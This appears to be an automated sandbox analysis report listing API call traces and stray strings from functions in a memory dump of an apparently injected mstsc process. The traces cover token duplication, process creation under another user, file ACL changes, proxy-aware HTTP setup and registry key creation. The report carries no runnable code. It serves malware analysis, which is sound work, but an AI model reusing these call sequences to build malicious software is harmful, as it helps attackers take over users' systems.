Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 000659A8
Part of subcall function 00064E4E: GetMenuCheckMarkDimensions.USER32 ref: 000659C2
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000012), ref: 00065A39
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065A3C
Part of subcall function 00064E4E: GetLogicalDrives.KERNEL32 ref: 00065A56
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000012), ref: 00065AC5
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065AC8
Part of subcall function 00064E4E: GetLogicalDrives.KERNEL32 ref: 00065AE2
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001E), ref: 00065B66
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065B69
Part of subcall function 00064E4E: GetLogicalDrives.KERNEL32 ref: 00065B83
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00065BFC
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065BFF
Part of subcall function 00064E4E: GetFocus.USER32 ref: 00065C19
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001B), ref: 00065C93
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065C96
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32 ref: 00065CAE
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000013), ref: 00065D19
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065D1C
Part of subcall function 00064E4E: GetDoubleClickTime.USER32 ref: 00065D36
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000016), ref: 00065DA1
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065DA4
Part of subcall function 00064E4E: CountClipboardFormats.USER32 ref: 00065DBB
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 00065E30
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065E33
Part of subcall function 00064E4E: GetCaretBlinkTime.USER32 ref: 00065E4A
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00065EC0
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065EC3
Part of subcall function 00064E4E: DestroyCaret.USER32 ref: 00065EDA
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000018), ref: 00065F50
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065F53
Part of subcall function 00064E4E: GetClipboardViewer.USER32 ref: 00065F6D
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00065FE4
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065FE7
Part of subcall function 00064E4E: CloseClipboard.USER32 ref: 00065FFE
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000021), ref: 00066083
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00066086
Part of subcall function 00064E4E: GetLastError.KERNEL32 ref: 0006609D
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000014), ref: 0006610F
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00066112
Part of subcall function 00064E4E: GetTickCount.KERNEL32 ref: 00066129
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001F), ref: 000661AB
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 000661AE
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32 ref: 000661C6
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0006622E
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00066231
Part of subcall function 00064E4E: GetClipboardSequenceNumber.USER32 ref: 00066248
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001F), ref: 000662D1
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 000662D4
Part of subcall function 00064E4E: GetCaretBlinkTime.USER32 ref: 000662E8
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00066320
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066329
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,dFim7), ref: 00066331
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066334
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,tE0QRzR1xx3vniVk1VKKSNboiOMO5bcEV1I6GBiwPomHXkXxyn0wDEGzdhQff8tsmxSygyxpZPGmv9ZHfdFim7), ref: 0006633E
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066341
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,47505A70), ref: 00066348
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006634B
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,79677953), ref: 00066352
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066355
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,6D737438), ref: 0006635C
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006635F
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,5370665A), ref: 00066369
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006636C
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,47454477), ref: 00066373
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066376
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,6E797858), ref: 0006637D
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066380
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,58486D6F), ref: 00066387
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006638A
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,77694247), ref: 00066394
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066397
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,667A726A), ref: 000663A1
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663A4
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,6A327676), ref: 000663AE
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663B1
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,7945594C), ref: 000663BB
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663BE
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,53335655), ref: 000663C8
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663CB
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,56696E76), ref: 000663D5
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663D8
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,78783152), ref: 000663E2
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663E5
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,4B4B5631), ref: 000663EF
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663F2
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,485A3976), ref: 000663F9
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000663FC
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,47377263), ref: 00066406
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066409
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,356A7738), ref: 00066413
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066416
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,66516864), ref: 0006641D
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066420
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,31366B4A), ref: 0006642A
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006642D
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,49315645), ref: 00066437
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006643A
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,52554D49), ref: 00066444
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066447
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,37783247), ref: 00066451
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066454
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,73734533), ref: 0006645E
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066461
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,5A544772), ref: 0006646B
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006646E
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,344A4B51), ref: 00066478
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 0006647B
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,48376271), ref: 00066485
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066488
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,4A464336), ref: 00066492
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 00066495
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,62354F4D), ref: 0006649F
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000664A2
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,696F624E), ref: 000664AC
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000664AF
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,34367575), ref: 000664B9
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000664BC
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000000,?), ref: 000664C6
Part of subcall function 00064E4E: HeapFree.KERNEL32(00000000), ref: 000664C9

DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?), ref: 00066586
SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,?), ref: 000665A6
AllocateAndInitializeSid.ADVAPI32(?,00000001,00004000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 000665C0
GetLengthSid.ADVAPI32(?,?,?), ref: 000665D8
SetTokenInformation.ADVAPI32(?,00000019,?,-00000008,?,?), ref: 000665EB
FreeSid.ADVAPI32(?,?,?), ref: 000665F0
SetTokenInformation.ADVAPI32(?,0000001B,00000000,00000004,?,?), ref: 00066604
CreateEnvironmentBlock.USERENV(?,?,00000001,?,?), ref: 0006660F
GetProcessHeap.KERNEL32(00000008,00000041,?,?), ref: 00066679
HeapAlloc.KERNEL32(00000000,?,?), ref: 00066680
GetCaretBlinkTime.USER32 ref: 0006669C
GetProcessHeap.KERNEL32(00000008,00000031,?,?), ref: 000666FF
HeapAlloc.KERNEL32(00000000,?,?), ref: 00066706
CreatePopupMenu.USER32 ref: 0006671A
CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?), ref: 00066777
OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 00066793
CloseHandle.KERNEL32(?), ref: 000667A8
CloseHandle.KERNEL32(00007479), ref: 000667B0
DestroyEnvironmentBlock.USERENV(00000000,?,?), ref: 000667BB
CloseHandle.KERNEL32(?), ref: 000667C4
GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 000667C9
HeapFree.KERNEL32(00000000,?,?), ref: 000667D6
GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 000667DB
HeapFree.KERNEL32(00000000,?,?), ref: 000667E2
CloseHandle.KERNEL32(?), ref: 000667ED
CloseHandle.KERNEL32(00000000), ref: 000667F0

Strings

57@m, xrefs: 000666DD
Hj2ey1, xrefs: 000666B2
, xrefs: 000665CE
D, xrefs: 0006662A
xjne, xrefs: 00066649
?j[e, xrefs: 00066634
1Hj, xrefs: 00066665
=j^e, xrefs: 0006665E

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 000616A9, Relevance: 65.0, APIs: 23, Strings: 14, Instructions: 228

APIs

GetProcessHeap.KERNEL32(00000008,00000208,7142434B), ref: 000616C4
HeapAlloc.KERNEL32(00000000), ref: 000616C7

Part of subcall function 0006E684: GetModuleHandleA.KERNEL32(?,?), ref: 0006E6BD
Part of subcall function 0006E684: GetProcAddress.KERNEL32(00000000), ref: 0006E6C4

GetProcessHeap.KERNEL32(00000008,0000009D), ref: 000617AA
HeapAlloc.KERNEL32(00000000), ref: 000617AD
GetActiveWindow.USER32 ref: 000617C1
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 000617F0
GetProcessHeap.KERNEL32(00000008,00000039), ref: 00061836
HeapAlloc.KERNEL32(00000000), ref: 0006183D
GetCaretBlinkTime.USER32 ref: 00061854
StrStrIW.SHLWAPI(?,00000000), ref: 0006187E
GetProcessHeap.KERNEL32(00000008,00000051), ref: 000618ED
HeapAlloc.KERNEL32(00000000), ref: 000618F4
GetModuleHandleW.KERNEL32(00000000), ref: 0006190A
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 00061939
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00061942
HeapFree.KERNEL32(00000000), ref: 00061949
StrCatW.SHLWAPI(?), ref: 0006195C

Part of subcall function 0006DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0006DD37
Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD44
Part of subcall function 0006DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0006DD6B
Part of subcall function 0006DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00061970,?), ref: 0006DD76
Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD80
Part of subcall function 0006DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00061970,?), ref: 0006DD95
Part of subcall function 0006DD0B: CloseHandle.KERNEL32(00000000), ref: 0006DD9C
Part of subcall function 0006DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00061970,?), ref: 0006DDA9
Part of subcall function 0006DD0B: HeapFree.KERNEL32(00000000), ref: 0006DDB0

HeapFree.KERNEL32(00000000), ref: 000619BB

Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000008,00000015,00000000,?,?), ref: 00068799
Part of subcall function 00068761: HeapAlloc.KERNEL32(00000000), ref: 0006879C
Part of subcall function 00068761: GetTickCount.KERNEL32 ref: 000687B8
Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00068804
Part of subcall function 00068761: HeapAlloc.KERNEL32(00000000), ref: 00068807
Part of subcall function 00068761: GetCapture.USER32 ref: 00068819
Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0006886A
Part of subcall function 00068761: HeapAlloc.KERNEL32(00000000), ref: 00068871
Part of subcall function 00068761: GetCursor.USER32 ref: 00068885
Part of subcall function 00068761: LoadLibraryA.KERNEL32(66713859), ref: 000688B6
Part of subcall function 00068761: GetProcAddress.KERNEL32(00000000), ref: 000688BD
Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000688DF
Part of subcall function 00068761: HeapFree.KERNEL32(00000000), ref: 000688EC
Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000000,66713859), ref: 000688F7
Part of subcall function 00068761: HeapFree.KERNEL32(00000000), ref: 000688FA
Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000000,?), ref: 00068901
Part of subcall function 00068761: HeapFree.KERNEL32(00000000), ref: 00068904

Part of subcall function 0006D8BA: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0006D8EA
Part of subcall function 0006D8BA: SetEntriesInAclW.ADVAPI32(00000001,000000FF,00000000,?), ref: 0006D920
Part of subcall function 0006D8BA: LocalAlloc.KERNEL32(00000040,00000014), ref: 0006D92A
Part of subcall function 0006D8BA: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0006D934
Part of subcall function 0006D8BA: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 0006D941
Part of subcall function 0006D8BA: SetFileSecurityW.ADVAPI32(?,00000004,00000000), ref: 0006D94B
Part of subcall function 0006D8BA: FreeSid.ADVAPI32(00000000), ref: 0006D95A
Part of subcall function 0006D8BA: LocalFree.KERNEL32(00000000), ref: 0006D96F
Part of subcall function 0006D8BA: LocalFree.KERNEL32(00000000), ref: 0006D976

Part of subcall function 00061560: StrDupW.SHLWAPI(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00061992), ref: 0006158B
Part of subcall function 00061560: GetProcessHeap.KERNEL32(00000008,00000015), ref: 000615D6
Part of subcall function 00061560: HeapAlloc.KERNEL32(00000000), ref: 000615D9
Part of subcall function 00061560: GetClipboardViewer.USER32 ref: 000615E8
Part of subcall function 00061560: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00061639
Part of subcall function 00061560: HeapFree.KERNEL32(00000000), ref: 0006163C
Part of subcall function 00061560: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00061992), ref: 0006166C
Part of subcall function 00061560: HeapFree.KERNEL32(00000000), ref: 0006166F
Part of subcall function 00061560: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00061992), ref: 0006167A
Part of subcall function 00061560: HeapFree.KERNEL32(00000000), ref: 0006167D

GetProcessHeap.KERNEL32(00000000,?), ref: 0006199E
HeapFree.KERNEL32(00000000), ref: 000619A1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000619AA
HeapFree.KERNEL32(00000000), ref: 000619B3
GetProcessHeap.KERNEL32(00000000,?), ref: 000619B8

Strings

CN)J, xrefs: 0006171B
3d'N, xrefs: 00061700
97Ce, xrefs: 0006180F
TelI, xrefs: 00061824
KCBq, xrefs: 000618E2
JWd#, xrefs: 0006176F
!J6d, xrefs: 00061714
q;K,, xrefs: 000618AE
Cgq5, xrefs: 000618BC
6N%J, xrefs: 000616F4
PJ6d, xrefs: 000616EB
J+df, xrefs: 00061792
i8C), xrefs: 000618CA
i.C/, xrefs: 000618A7

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006890F, Relevance: 63.2, APIs: 29, Strings: 7, Instructions: 206

APIs

lstrlenW.KERNEL32(00106D80,76AD46E9,7142434B,76E6FE8D), ref: 00068921
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00068941
HeapAlloc.KERNEL32(00000000), ref: 00068944
GetProcessHeap.KERNEL32(00000008,?), ref: 00068963
HeapAlloc.KERNEL32(00000000), ref: 00068966
lstrcpyW.KERNEL32(00000000,?), ref: 0006897B
GetProcessHeap.KERNEL32(00000008,00000021), ref: 000689BB
HeapAlloc.KERNEL32(00000000), ref: 000689BE
GetClipboardOwner.USER32 ref: 000689D2
GetTickCount.KERNEL32(00000005), ref: 000689FE
wsprintfW.USER32 ref: 00068A0F
wsprintfW.USER32 ref: 00068A1F
GetProcessHeap.KERNEL32(00000008,00000104), ref: 00068A33
HeapAlloc.KERNEL32(00000000), ref: 00068A36
GetTickCount.KERNEL32 ref: 00068A47
GetProcessHeap.KERNEL32(00000008,00000044), ref: 00068AE0
HeapAlloc.KERNEL32(00000000), ref: 00068AE3
GetClipboardSequenceNumber.USER32 ref: 00068AF7
wsprintfA.USER32 ref: 00068B2D

Part of subcall function 0006DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0006DD37
Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD44
Part of subcall function 0006DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0006DD6B
Part of subcall function 0006DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00061970,?), ref: 0006DD76
Part of subcall function 0006DD0B: GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD80
Part of subcall function 0006DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00061970,?), ref: 0006DD95
Part of subcall function 0006DD0B: CloseHandle.KERNEL32(00000000), ref: 0006DD9C
Part of subcall function 0006DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00061970,?), ref: 0006DDA9
Part of subcall function 0006DD0B: HeapFree.KERNEL32(00000000), ref: 0006DDB0

HeapFree.KERNEL32(00000000), ref: 00068B79

Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000008,00000015,00000000,?,?), ref: 00068799
Part of subcall function 00068761: HeapAlloc.KERNEL32(00000000), ref: 0006879C
Part of subcall function 00068761: GetTickCount.KERNEL32 ref: 000687B8
Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00068804
Part of subcall function 00068761: HeapAlloc.KERNEL32(00000000), ref: 00068807
Part of subcall function 00068761: GetCapture.USER32 ref: 00068819
Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0006886A
Part of subcall function 00068761: HeapAlloc.KERNEL32(00000000), ref: 00068871
Part of subcall function 00068761: GetCursor.USER32 ref: 00068885
Part of subcall function 00068761: LoadLibraryA.KERNEL32(66713859), ref: 000688B6
Part of subcall function 00068761: GetProcAddress.KERNEL32(00000000), ref: 000688BD
Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000688DF
Part of subcall function 00068761: HeapFree.KERNEL32(00000000), ref: 000688EC
Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000000,66713859), ref: 000688F7
Part of subcall function 00068761: HeapFree.KERNEL32(00000000), ref: 000688FA
Part of subcall function 00068761: GetProcessHeap.KERNEL32(00000000,?), ref: 00068901
Part of subcall function 00068761: HeapFree.KERNEL32(00000000), ref: 00068904

GetProcessHeap.KERNEL32(00000000,?), ref: 00068B60
HeapFree.KERNEL32(00000000), ref: 00068B67
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068B76
GetProcessHeap.KERNEL32(00000000,?), ref: 00068B84
HeapFree.KERNEL32(00000000), ref: 00068B87
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068B90
HeapFree.KERNEL32(00000000), ref: 00068B93
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068B9F
HeapFree.KERNEL32(00000000), ref: 00068BA2

Strings

UDD, xrefs: 00068AB4
KCBqiNhR7x, xrefs: 0006890F
XlCI, xrefs: 00068AC2
"%s", xrefs: 00068A17
PDID, xrefs: 00068A6F
xIfy, xrefs: 00068AD3
C\DA, xrefs: 00068AA6

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006485C, Relevance: 63.2, APIs: 27, Strings: 9, Instructions: 193

APIs

GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006487E
HeapAlloc.KERNEL32(00000000), ref: 00064881
GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006489A
HeapAlloc.KERNEL32(00000000), ref: 0006489D
OpenProcess.KERNEL32(00000400,00000000), ref: 000648D1
OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00064907
ProcessIdToSessionId.KERNEL32(?,?), ref: 00064921
GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00064942
GetLastError.KERNEL32 ref: 00064944
GetProcessHeap.KERNEL32(00000008,?), ref: 00064958
HeapAlloc.KERNEL32(00000000), ref: 0006495B
GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00064979
LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0006499D
GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00064A0C
HeapAlloc.KERNEL32(00000000), ref: 00064A0F
GetCursor.USER32 ref: 00064A20
wsprintfW.USER32 ref: 00064A53
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064A6C
HeapFree.KERNEL32(00000000), ref: 00064A75
GetProcessHeap.KERNEL32(00000000,?), ref: 00064A7C
HeapFree.KERNEL32(00000000), ref: 00064A7F
CloseHandle.KERNEL32(00000000), ref: 00064A84
CloseHandle.KERNEL32(?), ref: 00064A8D
GetProcessHeap.KERNEL32(00000000,?), ref: 00064A9B
HeapFree.KERNEL32(00000000), ref: 00064A9E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064AA3
HeapFree.KERNEL32(00000000), ref: 00064AA6

Strings

8'Z, xrefs: 000649B9
L, xrefs: 000649E1
Ni, xrefs: 00064A26
L=8t, xrefs: 000649F6
8tZLY, xrefs: 00064A36
Z, xrefs: 000649FD
Lc8(, xrefs: 000649CD
8QZ?, xrefs: 000649E8
t), xrefs: 000649DB

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 000635A5, Relevance: 61.5, APIs: 32, Strings: 3, Instructions: 292

APIs

WinHttpGetIEProxyConfigForCurrentUser.WINHTTP(?,00000000,?,00000000), ref: 000635E0
WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000), ref: 0006361F
WinHttpGetProxyForUrl.WINHTTP(00000000,?,00000000,?), ref: 00063677
StrCpyW.SHLWAPI(?,00000000), ref: 0006368D
WinHttpCloseHandle.WINHTTP(00000000), ref: 00063694
GlobalFree.KERNEL32(00000000), ref: 000636A9
GlobalFree.KERNEL32(00000000), ref: 000636B8
WinHttpCloseHandle.WINHTTP(00000000), ref: 000636C0
GlobalFree.KERNEL32(00000000), ref: 000636D5
GlobalFree.KERNEL32(00000000), ref: 000636E0
PathMatchSpecW.SHLWAPI(?,00000000), ref: 000636FD
StrCpyW.SHLWAPI(?,00000000), ref: 0006372D
GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0006376A
HeapAlloc.KERNEL32(00000000), ref: 0006376D
GetDoubleClickTime.USER32 ref: 0006378B
GetProcessHeap.KERNEL32(00000008,00000019), ref: 000637E0
HeapAlloc.KERNEL32(00000000), ref: 000637E3
GetCurrentThreadId.KERNEL32 ref: 000637F7
StrStrIW.SHLWAPI(?,?), ref: 00063824
StrStrIW.SHLWAPI(00000000,00000000), ref: 0006384C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063886
HeapFree.KERNEL32(00000000), ref: 0006388F
GetProcessHeap.KERNEL32(00000000,?), ref: 00063894
HeapFree.KERNEL32(00000000), ref: 00063897
GlobalFree.KERNEL32(00000000), ref: 000638AA
GlobalFree.KERNEL32(?), ref: 000638B4
GlobalFree.KERNEL32(00000000), ref: 000638BF
StrCpyW.SHLWAPI(?,-00000002), ref: 000638D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000638DA
HeapFree.KERNEL32(00000000), ref: 000638E7
GetProcessHeap.KERNEL32(00000000,?), ref: 000638EC
HeapFree.KERNEL32(00000000), ref: 000638F3

Part of subcall function 00063551: WinHttpCrackUrl.WINHTTP(?,?,00000000,0000003C,?,00000208), ref: 00063593

Strings

4A, xrefs: 00063757
Z2w, xrefs: 000637C5
4Ac85L, xrefs: 000637A2

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00063E17, Relevance: 59.8, APIs: 28, Strings: 6, Instructions: 264

APIs

GetProcessHeap.KERNEL32(00000008,00000208,0007CAA8), ref: 00063E3F
HeapAlloc.KERNEL32(00000000), ref: 00063E42

Part of subcall function 00063950: GetVersion.KERNEL32(76E6FE8D,00000000,?), ref: 00063971
Part of subcall function 00063950: GetProcessHeap.KERNEL32(00000008,00000025), ref: 000639B0
Part of subcall function 00063950: HeapAlloc.KERNEL32(00000000), ref: 000639B7
Part of subcall function 00063950: GetCurrentProcessId.KERNEL32 ref: 000639C8
Part of subcall function 00063950: GetProcessHeap.KERNEL32(00000008,00000051), ref: 00063A72
Part of subcall function 00063950: HeapAlloc.KERNEL32(00000000), ref: 00063A79
Part of subcall function 00063950: GetForegroundWindow.USER32 ref: 00063A8A
Part of subcall function 00063950: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00063AC8
Part of subcall function 00063950: HeapFree.KERNEL32(00000000), ref: 00063ACF

Part of subcall function 000638F7: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,0006131B,00000000,0006131B,00000000,00000001,?,0006131B,00020006), ref: 00063929
Part of subcall function 000638F7: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,0006131B,0006131B,?,0006131B,00020006), ref: 0006393C

